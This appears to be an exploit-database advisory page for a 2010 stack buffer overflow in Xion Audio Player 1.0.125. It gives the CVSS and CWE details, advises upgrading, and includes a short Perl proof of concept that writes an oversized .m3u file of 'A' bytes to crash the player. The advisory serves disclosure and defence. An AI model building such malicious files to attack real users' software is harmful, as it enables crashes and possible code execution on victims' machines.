header-logo
Suggest Exploit
vendor:
Xion Audio Player
by:
Hadji Samir
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Xion Audio Player
Affected Version From: 1.0.125
Affected Version To: 1.0.125
Patch Exists: Yes
Related CWE: N/A
CPE: a:xion_audio_player:xion_audio_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2010

Xion Audio Player Buffer Overflow

A buffer overflow vulnerability exists in Xion Audio Player version 1.0.125. The vulnerability is caused due to a boundary error when handling specially crafted .m3u files. This can be exploited to cause a stack-based buffer overflow by tricking a user into opening a specially crafted .m3u file. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to the latest version of Xion Audio Player
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Xion Audio Player version: 1.0.125
# Author: hadji samir        , s-dz@hotmail.fr
# Download : http://xion.r2.com.au/index.php?page=download
# Tested : Windows XP SP2 (fr)
# DATE   : 2010-07-31
#
#  thanks mo3taz  wnass cfa nta3 blida
#
#  et samir tjrs mahboul-3lik
#
################################################################### 

my $file= "mahboul-3lik00.m3u";

my $junk= "\x41" x  50000;
 
open($FILE, ">$file");
print($FILE $junk);
close($FILE);
print("exploit created successfully");

Navigation

Suggest Exploit

Services By CQR